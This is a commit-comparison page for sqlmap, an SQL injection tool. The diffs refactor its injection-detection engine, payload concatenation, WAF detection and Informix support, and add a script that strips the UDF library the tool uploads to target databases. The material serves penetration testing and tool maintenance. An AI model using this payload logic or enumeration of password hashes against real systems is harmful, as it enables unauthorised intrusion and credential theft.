Compare commits

..

65 Commits

Author SHA1 Message Date
Miroslav Stampar
54ca69fa90 Proper form for excluded case in escaper 2016-10-01 21:15:35 +02:00
Miroslav Stampar
d8dd37510c Fixes #2202 2016-10-01 21:02:40 +02:00
Miroslav Stampar
d1680b04f3 Minor code consistency update 2016-09-29 21:26:47 +02:00
Miroslav Stampar
102d4b4119 Bug fix for uploading files in case of web subdirectories 2016-09-29 21:14:28 +02:00
Miroslav Stampar
b3b49b3492 Minor patch for --parse-errors 2016-09-29 18:07:00 +02:00
Miroslav Stampar
7a89433251 Minor patch 2016-09-29 18:02:20 +02:00
Miroslav Stampar
ced6711128 Playing a bit with logo 2016-09-29 15:59:28 +02:00
Miroslav Stampar
bdf76f8d4d Revisiting user-agents (newer versions of mainstream browsers) 2016-09-29 15:21:32 +02:00
Miroslav Stampar
571ae174bd Minor language update 2016-09-29 14:55:43 +02:00
Miroslav Stampar
332726356c Minor language update 2016-09-29 14:03:46 +02:00
Miroslav Stampar
4ea9d3b884 Replacing generic concatenation || with CONCAT (far better choice) 2016-09-29 13:35:16 +02:00
Miroslav Stampar
3409953538 Revisiting default level 1 payloads (MySQL stacked queries are as frequent as double rainbows) 2016-09-29 12:59:51 +02:00
Miroslav Stampar
3b3ab072e6 Adding short option(s) for setting verbosity (e.g. -vvv) 2016-09-29 11:19:25 +02:00
Miroslav Stampar
fef407e09c Making HTTP requests up to 20% smaller (fine tuning the request headers) 2016-09-29 10:44:00 +02:00
Miroslav Stampar
5afccce3c6 Minor patch 2016-09-28 16:56:47 +02:00
Miroslav Stampar
e439095593 Bug fix for MySQL's --os-pwn 2016-09-28 15:39:34 +02:00
Miroslav Stampar
e77126e847 Removing obsolete functionality 2016-09-28 15:00:26 +02:00
Miroslav Stampar
3ef01f0e31 Minor update 2016-09-28 14:48:33 +02:00
Miroslav Stampar
d36b5c0a4b Adding time-based blind (heavy query) payloads for Informix (Issue #552) 2016-09-28 10:30:09 +02:00
Miroslav Stampar
e5a758bdf4 Fixes #2192 2016-09-28 09:55:14 +02:00
Miroslav Stampar
617509869d Minor patch for Informix --parse-errors 2016-09-27 14:58:10 +02:00
Miroslav Stampar
5079c42788 Adding Informix parameter replacement payloads (Issue #552) 2016-09-27 14:39:17 +02:00
Miroslav Stampar
bc7ab01066 Bug fix for generic parameter replacement (CASE) 2016-09-27 14:29:18 +02:00
Miroslav Stampar
212c1ec1f2 Couple of fixes and some testing stuff 2016-09-27 14:03:59 +02:00
Miroslav Stampar
381deb68ff Implementation for an Issue #2137 2016-09-27 13:26:11 +02:00
Miroslav Stampar
ba0facb5eb Removal of unused imports 2016-09-27 11:23:31 +02:00
Miroslav Stampar
7151df16f6 Adding extra validation step in case of boolean-based blind (e.g. if unexpected 500 occurs) 2016-09-27 11:21:12 +02:00
Miroslav Stampar
8994bf2dba Further dealing with time-based SQLi (Issue #1973) 2016-09-27 10:32:22 +02:00
Miroslav Stampar
09617c8243 Introducing extra validation property in case of time-based SQLi (HTTP code) - Issue #1973 2016-09-27 10:20:36 +02:00
Miroslav Stampar
556b4d289e Minor cosmetic patch (removing multiple same content '...appears...' messages) 2016-09-26 17:02:40 +02:00
Miroslav Stampar
978f56ad10 One more commit for #552 (--passwords) 2016-09-26 16:38:03 +02:00
Miroslav Stampar
aa0b97b562 Support for Informix --roles/--privileges (Issue #552) 2016-09-26 14:20:04 +02:00
Miroslav Stampar
df645d7d3d Update for column types (Issue #552) 2016-09-23 18:03:31 +02:00
Miroslav Stampar
035137ef4e Bug fix in detection engine (abstract URI header sometimes caused problems - e.g. when automatic --string used) 2016-09-23 17:38:14 +02:00
Miroslav Stampar
484d9a4825 Implementation of --dump for Informix (Issue #552) 2016-09-23 17:21:48 +02:00
Miroslav Stampar
65c305cff0 Fixes #2174 2016-09-23 15:41:12 +02:00
Miroslav Stampar
9a5fc5ccf4 New auxiliary (extra) file (for administration purposes) 2016-09-23 13:57:18 +02:00
Miroslav Stampar
51a1973224 Stripping PostgreSQL .so files for size issues (Issue #2173) 2016-09-23 13:52:57 +02:00
Miroslav Stampar
2f2a63334a Minor cleanup 2016-09-23 13:39:27 +02:00
Miroslav Stampar
23afeb4c7a Fixes #2176 2016-09-23 13:37:44 +02:00
Miroslav Stampar
b387fb219d Fixes #2175 2016-09-23 12:45:06 +02:00
Miroslav Stampar
1b48ff223d Adding initial support for Informix (Issue #552) 2016-09-23 12:33:27 +02:00
Miroslav Stampar
640e605412 More CTF friendly (common column and table name flag :) 2016-09-23 12:31:28 +02:00
Miroslav Stampar
e10bb42597 Minor tweak 2016-09-22 10:22:48 +02:00
Miroslav Stampar
9902018cab Implementation for an Issue #2172 2016-09-21 15:45:55 +02:00
Miroslav Stampar
56a918c408 Minor refactoring 2016-09-20 10:03:00 +02:00
Miroslav Stampar
bcd62ecc5b Minor optimization (avoiding unnecessary deepcopies) 2016-09-20 09:56:08 +02:00
Miroslav Stampar
e519484230 Patching live-testing 2016-09-19 15:51:28 +02:00
Miroslav Stampar
a2c8f1deb1 Update PgSQL fingerprinting payloads 2016-09-19 14:23:51 +02:00
Miroslav Stampar
12dc53f687 Minor update 2016-09-19 13:54:06 +02:00
Miroslav Stampar
b3b5bd267d Adding new tamper script (on request from @MilanGabor) 2016-09-15 17:59:01 +02:00
Miroslav Stampar
edcfffc279 Merge pull request #2170 from ClementNotin/ClementNotin-patch-netscaler.py
Fix "or-assign" for return value in netscaler.py
2016-09-15 17:29:31 +02:00
Clément Notin
3bbfd0665c Fix "or-assign" for return value in netscaler.py 2016-09-15 16:56:49 +02:00
Miroslav Stampar
921a53e314 Patch for counter in --smoke-test 2016-09-09 14:59:22 +02:00
Miroslav Stampar
32dd4a938c Minor patch of message 2016-09-09 11:37:16 +02:00
Miroslav Stampar
9930f1b55b Speed optimization(s) 2016-09-09 11:06:38 +02:00
Miroslav Stampar
8581d9e2ca Minor improvement of SELECT_FROM_TABLE_REGEX 2016-09-09 09:45:48 +02:00
Miroslav Stampar
1a613ed9a8 Minor update 2016-09-08 14:08:14 +02:00
Miroslav Stampar
78e398d9c4 Fixes #2136 2016-09-06 15:03:17 +02:00
Miroslav Stampar
e3c3c2c185 Fixes #2148 2016-09-06 14:25:29 +02:00
Miroslav Stampar
4e36bbaff9 Update related to the last commit 2016-09-04 03:09:28 +02:00
Miroslav Stampar
603e9739ae Fixes #2146 2016-09-04 01:33:52 +02:00
Miroslav Stampar
6b91b7b7fa Minor cosmetics 2016-09-02 16:10:11 +02:00
Miroslav Stampar
2e62fda57d Minor update 2016-09-02 15:55:33 +02:00
Miroslav Stampar
5ad27264a2 Patches #2143 2016-09-02 15:52:07 +02:00
69 changed files with 5245 additions and 3131 deletions

View File

@@ -23,7 +23,7 @@ HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})"
SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c" SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c"
# Characters that don't need to be safe encoded # Characters that don't need to be safe encoded
SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', ''))) SAFE_CHARS = "".join(filter(lambda _: _ not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', '')))
# Prefix used for hex encoded values # Prefix used for hex encoded values
HEX_ENCODED_PREFIX = r"\x" HEX_ENCODED_PREFIX = r"\x"
@@ -47,7 +47,7 @@ def safecharencode(value):
retVal = value retVal = value
if isinstance(value, basestring): if isinstance(value, basestring):
if any(_ not in SAFE_CHARS for _ in value): if any([_ not in SAFE_CHARS for _ in value]):
retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER) retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER)
retVal = retVal.replace('\\', SLASH_MARKER) retVal = retVal.replace('\\', SLASH_MARKER)

15
extra/shutils/strip.sh Normal file
View File

@@ -0,0 +1,15 @@
#!/bin/bash
# References: http://www.thegeekstuff.com/2012/09/strip-command-examples/
# http://www.muppetlabs.com/~breadbox/software/elfkickers.html
# https://ptspts.blogspot.hr/2013/12/how-to-make-smaller-c-and-c-binaries.html
# For example:
# python ../../../../../extra/cloak/cloak.py -d -i lib_postgresqludf_sys.so_
# ../../../../../extra/shutils/strip.sh lib_postgresqludf_sys.so
# python ../../../../../extra/cloak/cloak.py -i lib_postgresqludf_sys.so
# rm lib_postgresqludf_sys.so
strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag $*
sstrip $*

View File

@@ -74,8 +74,7 @@ def action():
if conf.getPasswordHashes: if conf.getPasswordHashes:
try: try:
conf.dumper.userSettings("database management system users password hashes", conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
except SqlmapNoneDataException, ex: except SqlmapNoneDataException, ex:
logger.critical(ex) logger.critical(ex)
except: except:
@@ -83,8 +82,7 @@ def action():
if conf.getPrivileges: if conf.getPrivileges:
try: try:
conf.dumper.userSettings("database management system users privileges", conf.dumper.userSettings("database management system users privileges", conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
except SqlmapNoneDataException, ex: except SqlmapNoneDataException, ex:
logger.critical(ex) logger.critical(ex)
except: except:
@@ -92,8 +90,7 @@ def action():
if conf.getRoles: if conf.getRoles:
try: try:
conf.dumper.userSettings("database management system users roles", conf.dumper.userSettings("database management system users roles", conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
except SqlmapNoneDataException, ex: except SqlmapNoneDataException, ex:
logger.critical(ex) logger.critical(ex)
except: except:

View File

@@ -74,6 +74,7 @@ from lib.core.settings import IDS_WAF_CHECK_RATIO
from lib.core.settings import IDS_WAF_CHECK_TIMEOUT from lib.core.settings import IDS_WAF_CHECK_TIMEOUT
from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH
from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
from lib.core.settings import SLEEP_TIME_MARKER
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import SUPPORTED_DBMS
from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import URI_HTTP_HEADER
@@ -94,6 +95,13 @@ def checkSqlInjection(place, parameter, value):
# Localized thread data needed for some methods # Localized thread data needed for some methods
threadData = getCurrentThreadData() threadData = getCurrentThreadData()
# Favoring non-string specific boundaries in case of digit-like parameter values
if value.isdigit():
kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
boundaries = kb.cache.intBoundaries
else:
boundaries = conf.boundaries
# Set the flag for SQL injection test mode # Set the flag for SQL injection test mode
kb.testMode = True kb.testMode = True
@@ -149,6 +157,7 @@ def checkSqlInjection(place, parameter, value):
kb.testType = stype = test.stype kb.testType = stype = test.stype
clause = test.clause clause = test.clause
unionExtended = False unionExtended = False
trueCode, falseCode = None, None
if stype == PAYLOAD.TECHNIQUE.UNION: if stype == PAYLOAD.TECHNIQUE.UNION:
configUnion(test.request.char) configUnion(test.request.char)
@@ -311,12 +320,6 @@ def checkSqlInjection(place, parameter, value):
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
# Favoring non-string specific boundaries in case of digit-like parameter values
if value.isdigit():
boundaries = sorted(copy.deepcopy(conf.boundaries), key=lambda x: any(_ in (x.prefix or "") or _ in (x.suffix or "") for _ in ('"', '\'')))
else:
boundaries = conf.boundaries
for boundary in boundaries: for boundary in boundaries:
injectable = False injectable = False
@@ -519,7 +522,7 @@ def checkSqlInjection(place, parameter, value):
if not any((conf.string, conf.notString, conf.code)): if not any((conf.string, conf.notString, conf.code)):
infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title) infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title)
logger.info(infoMsg) singleTimeLogMessage(infoMsg)
# In case of error-based SQL injection # In case of error-based SQL injection
elif method == PAYLOAD.METHOD.GREP: elif method == PAYLOAD.METHOD.GREP:
@@ -555,8 +558,15 @@ def checkSqlInjection(place, parameter, value):
elif method == PAYLOAD.METHOD.TIME: elif method == PAYLOAD.METHOD.TIME:
# Perform the test's request # Perform the test's request
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False) trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
trueCode = threadData.lastCode
if trueResult: if trueResult:
# Extra validation step (e.g. to check for DROP protection mechanisms)
if SLEEP_TIME_MARKER in reqPayload:
falseResult = Request.queryPage(reqPayload.replace(SLEEP_TIME_MARKER, "0"), place, timeBasedCompare=True, raise404=False)
if falseResult:
continue
# Confirm test's results # Confirm test's results
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False) trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
@@ -667,6 +677,8 @@ def checkSqlInjection(place, parameter, value):
injection.data[stype].comment = comment injection.data[stype].comment = comment
injection.data[stype].templatePayload = templatePayload injection.data[stype].templatePayload = templatePayload
injection.data[stype].matchRatio = kb.matchRatio injection.data[stype].matchRatio = kb.matchRatio
injection.data[stype].trueCode = trueCode
injection.data[stype].falseCode = falseCode
injection.conf.textOnly = conf.textOnly injection.conf.textOnly = conf.textOnly
injection.conf.titles = conf.titles injection.conf.titles = conf.titles
@@ -1317,7 +1329,7 @@ def identifyWaf():
kb.redirectChoice = popValue() kb.redirectChoice = popValue()
return page or "", headers or {}, code return page or "", headers or {}, code
retVal = False retVal = []
for function, product in kb.wafFunctions: for function, product in kb.wafFunctions:
try: try:
@@ -1331,18 +1343,20 @@ def identifyWaf():
found = False found = False
if found: if found:
retVal = product errMsg = "WAF/IDS/IPS identified as '%s'" % product
break
if retVal:
errMsg = "WAF/IDS/IPS identified as '%s'. Please " % retVal
errMsg += "consider usage of tamper scripts (option '--tamper')"
logger.critical(errMsg) logger.critical(errMsg)
retVal.append(product)
if retVal:
message = "are you sure that you want to " message = "are you sure that you want to "
message += "continue with further target testing? [y/N] " message += "continue with further target testing? [y/N] "
output = readInput(message, default="N") output = readInput(message, default="N")
if not conf.tamper:
warnMsg = "please consider usage of tamper scripts (option '--tamper')"
singleTimeWarnMessage(warnMsg)
if output and output[0] not in ("Y", "y"): if output and output[0] not in ("Y", "y"):
raise SqlmapUserQuitException raise SqlmapUserQuitException
else: else:
@@ -1374,7 +1388,7 @@ def checkNullConnection():
if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}): if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
kb.nullConnection = NULLCONNECTION.HEAD kb.nullConnection = NULLCONNECTION.HEAD
infoMsg = "NULL connection is supported with HEAD header" infoMsg = "NULL connection is supported with HEAD method (Content-Length)"
logger.info(infoMsg) logger.info(infoMsg)
else: else:
page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"}) page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"})
@@ -1382,7 +1396,7 @@ def checkNullConnection():
if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}): if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}):
kb.nullConnection = NULLCONNECTION.RANGE kb.nullConnection = NULLCONNECTION.RANGE
infoMsg = "NULL connection is supported with GET header " infoMsg = "NULL connection is supported with GET method (Range)"
infoMsg += "'%s'" % kb.nullConnection infoMsg += "'%s'" % kb.nullConnection
logger.info(infoMsg) logger.info(infoMsg)
else: else:

View File

@@ -545,7 +545,7 @@ def start():
kb.testedParams.add(paramKey) kb.testedParams.add(paramKey)
if not injectable: if not injectable:
warnMsg = "%s parameter '%s' is not " % (paramType, parameter) warnMsg = "%s parameter '%s' does not seem to be " % (paramType, parameter)
warnMsg += "injectable" warnMsg += "injectable"
logger.warn(warnMsg) logger.warn(warnMsg)

View File

@@ -22,6 +22,7 @@ from lib.core.settings import MAXDB_ALIASES
from lib.core.settings import SYBASE_ALIASES from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import DB2_ALIASES from lib.core.settings import DB2_ALIASES
from lib.core.settings import HSQLDB_ALIASES from lib.core.settings import HSQLDB_ALIASES
from lib.core.settings import INFORMIX_ALIASES
from lib.utils.sqlalchemy import SQLAlchemy from lib.utils.sqlalchemy import SQLAlchemy
from plugins.dbms.mssqlserver import MSSQLServerMap from plugins.dbms.mssqlserver import MSSQLServerMap
@@ -46,6 +47,8 @@ from plugins.dbms.db2 import DB2Map
from plugins.dbms.db2.connector import Connector as DB2Conn from plugins.dbms.db2.connector import Connector as DB2Conn
from plugins.dbms.hsqldb import HSQLDBMap from plugins.dbms.hsqldb import HSQLDBMap
from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn
from plugins.dbms.informix import InformixMap
from plugins.dbms.informix.connector import Connector as InformixConn
def setHandler(): def setHandler():
""" """
@@ -65,6 +68,7 @@ def setHandler():
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn), (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn), (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
(DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn), (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
] ]
_ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items) _ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)

View File

@@ -43,6 +43,7 @@ from lib.core.settings import GENERIC_SQL_COMMENT
from lib.core.settings import NULL from lib.core.settings import NULL
from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import REPLACEMENT_MARKER from lib.core.settings import REPLACEMENT_MARKER
from lib.core.settings import SLEEP_TIME_MARKER
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
class Agent(object): class Agent(object):
@@ -343,7 +344,7 @@ class Agent(object):
""" """
if payload: if payload:
payload = payload.replace("[SLEEPTIME]", str(conf.timeSec)) payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec))
return payload return payload
@@ -486,7 +487,7 @@ class Agent(object):
@rtype: C{str} @rtype: C{str}
""" """
prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT \d+)\s+\d+)*" prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT(?: \d+)?)\s+\d+)*"
fieldsSelectTop = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I) fieldsSelectTop = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I)
fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I) fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I)
fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I) fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I)
@@ -507,26 +508,26 @@ class Agent(object):
if fieldsSubstr: if fieldsSubstr:
fieldsToCastStr = query fieldsToCastStr = query
elif fieldsMinMaxstr: elif fieldsMinMaxstr:
fieldsToCastStr = fieldsMinMaxstr.groups()[0] fieldsToCastStr = fieldsMinMaxstr.group(1)
elif fieldsExists: elif fieldsExists:
if fieldsSelect: if fieldsSelect:
fieldsToCastStr = fieldsSelect.groups()[0] fieldsToCastStr = fieldsSelect.group(1)
elif fieldsSelectTop: elif fieldsSelectTop:
fieldsToCastStr = fieldsSelectTop.groups()[0] fieldsToCastStr = fieldsSelectTop.group(1)
elif fieldsSelectRownum: elif fieldsSelectRownum:
fieldsToCastStr = fieldsSelectRownum.groups()[0] fieldsToCastStr = fieldsSelectRownum.group(1)
elif fieldsSelectDistinct: elif fieldsSelectDistinct:
if Backend.getDbms() in (DBMS.HSQLDB,): if Backend.getDbms() in (DBMS.HSQLDB,):
fieldsToCastStr = fieldsNoSelect fieldsToCastStr = fieldsNoSelect
else: else:
fieldsToCastStr = fieldsSelectDistinct.groups()[0] fieldsToCastStr = fieldsSelectDistinct.group(1)
elif fieldsSelectCase: elif fieldsSelectCase:
fieldsToCastStr = fieldsSelectCase.groups()[0] fieldsToCastStr = fieldsSelectCase.group(1)
elif fieldsSelectFrom: elif fieldsSelectFrom:
fieldsToCastStr = query[:unArrayizeValue(_)] if _ else query fieldsToCastStr = query[:unArrayizeValue(_)] if _ else query
fieldsToCastStr = re.sub(r"\ASELECT%s\s+" % prefixRegex, "", fieldsToCastStr) fieldsToCastStr = re.sub(r"\ASELECT%s\s+" % prefixRegex, "", fieldsToCastStr)
elif fieldsSelect: elif fieldsSelect:
fieldsToCastStr = fieldsSelect.groups()[0] fieldsToCastStr = fieldsSelect.group(1)
# Function # Function
if re.search("\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr: if re.search("\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr:
@@ -667,24 +668,23 @@ class Agent(object):
concatenatedQuery = "'%s'&%s&'%s'" % (kb.chars.start, concatenatedQuery, kb.chars.stop) concatenatedQuery = "'%s'&%s&'%s'" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
else: else:
warnMsg = "applying generic concatenation with double pipes ('||')" warnMsg = "applying generic concatenation (CONCAT)"
singleTimeWarnMessage(warnMsg) singleTimeWarnMessage(warnMsg)
if fieldsExists: if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += "||'%s'" % kb.chars.stop concatenatedQuery += "),'%s')" % kb.chars.stop
elif fieldsSelectCase: elif fieldsSelectCase:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||(SELECT " % kb.chars.start, 1) concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += ")||'%s'" % kb.chars.stop concatenatedQuery += "),'%s')" % kb.chars.stop
elif fieldsSelectFrom: elif fieldsSelectFrom:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
_ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM ")) _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:]) concatenatedQuery = "%s),'%s')%s" % (concatenatedQuery[:_].replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1), kb.chars.stop, concatenatedQuery[_:])
elif fieldsSelect: elif fieldsSelect:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += "||'%s'" % kb.chars.stop concatenatedQuery += "),'%s')" % kb.chars.stop
elif fieldsNoSelect: elif fieldsNoSelect:
concatenatedQuery = "'%s'||%s||'%s'" % (kb.chars.start, concatenatedQuery, kb.chars.stop) concatenatedQuery = "CONCAT(CONCAT('%s',%s),'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
return concatenatedQuery return concatenatedQuery

View File

@@ -813,11 +813,6 @@ def getAutoDirectories():
warnMsg = "unable to automatically parse any web server path" warnMsg = "unable to automatically parse any web server path"
logger.warn(warnMsg) logger.warn(warnMsg)
_ = extractRegexResult(r"//[^/]+?(?P<result>/.*)/", conf.url) # web directory
if _:
retVal.add(_)
return list(retVal) return list(retVal)
def filePathToSafeString(filePath): def filePathToSafeString(filePath):
@@ -1200,6 +1195,7 @@ def setPaths(rootPath):
paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads") paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads")
_ = os.path.join(os.path.expandvars(os.path.expanduser("~")), ".sqlmap") _ = os.path.join(os.path.expandvars(os.path.expanduser("~")), ".sqlmap")
paths.SQLMAP_HOME_PATH = _
paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
@@ -2227,10 +2223,6 @@ def getUnicode(value, encoding=None, noneToNull=False):
if noneToNull and value is None: if noneToNull and value is None:
return NULL return NULL
if isListLike(value):
value = list(getUnicode(_, encoding, noneToNull) for _ in value)
return value
if isinstance(value, unicode): if isinstance(value, unicode):
return value return value
elif isinstance(value, basestring): elif isinstance(value, basestring):
@@ -2242,6 +2234,9 @@ def getUnicode(value, encoding=None, noneToNull=False):
return unicode(value, UNICODE_ENCODING) return unicode(value, UNICODE_ENCODING)
except: except:
value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:] value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
elif isListLike(value):
value = list(getUnicode(_, encoding, noneToNull) for _ in value)
return value
else: else:
try: try:
return unicode(value) return unicode(value)
@@ -2559,6 +2554,7 @@ def logHTTPTraffic(requestLogMsg, responseLogMsg):
def getPageTemplate(payload, place): # Cross-linked function def getPageTemplate(payload, place): # Cross-linked function
raise NotImplementedError raise NotImplementedError
@cachedmethod
def getPublicTypeMembers(type_, onlyValues=False): def getPublicTypeMembers(type_, onlyValues=False):
""" """
Useful for getting members from types (e.g. in enums) Useful for getting members from types (e.g. in enums)
@@ -2567,12 +2563,16 @@ def getPublicTypeMembers(type_, onlyValues=False):
['Linux', 'Windows'] ['Linux', 'Windows']
""" """
retVal = []
for name, value in inspect.getmembers(type_): for name, value in inspect.getmembers(type_):
if not name.startswith('__'): if not name.startswith('__'):
if not onlyValues: if not onlyValues:
yield (name, value) retVal.append((name, value))
else: else:
yield value retVal.append(value)
return retVal
def enumValueToNameLookup(type_, value_): def enumValueToNameLookup(type_, value_):
""" """
@@ -3581,6 +3581,7 @@ def randomizeParameterValue(value):
return retVal return retVal
@cachedmethod
def asciifyUrl(url, forceQuote=False): def asciifyUrl(url, forceQuote=False):
""" """
Attempts to make a unicode URL usuable with ``urllib/urllib2``. Attempts to make a unicode URL usuable with ``urllib/urllib2``.
@@ -4075,8 +4076,11 @@ def getRequestHeader(request, name):
""" """
retVal = None retVal = None
if request and name: if request and name:
retVal = max(value if name.upper() == key.upper() else None for key, value in request.header_items()) _ = name.upper()
retVal = max([value if _ == key.upper() else None for key, value in request.header_items()])
return retVal return retVal
def isNumber(value): def isNumber(value):

View File

@@ -21,6 +21,7 @@ from lib.core.settings import MAXDB_ALIASES
from lib.core.settings import SYBASE_ALIASES from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import DB2_ALIASES from lib.core.settings import DB2_ALIASES
from lib.core.settings import HSQLDB_ALIASES from lib.core.settings import HSQLDB_ALIASES
from lib.core.settings import INFORMIX_ALIASES
FIREBIRD_TYPES = { FIREBIRD_TYPES = {
261: "BLOB", 261: "BLOB",
@@ -39,6 +40,41 @@ FIREBIRD_TYPES = {
37: "VARCHAR", 37: "VARCHAR",
} }
INFORMIX_TYPES = {
0: "CHAR",
1: "SMALLINT",
2: "INTEGER",
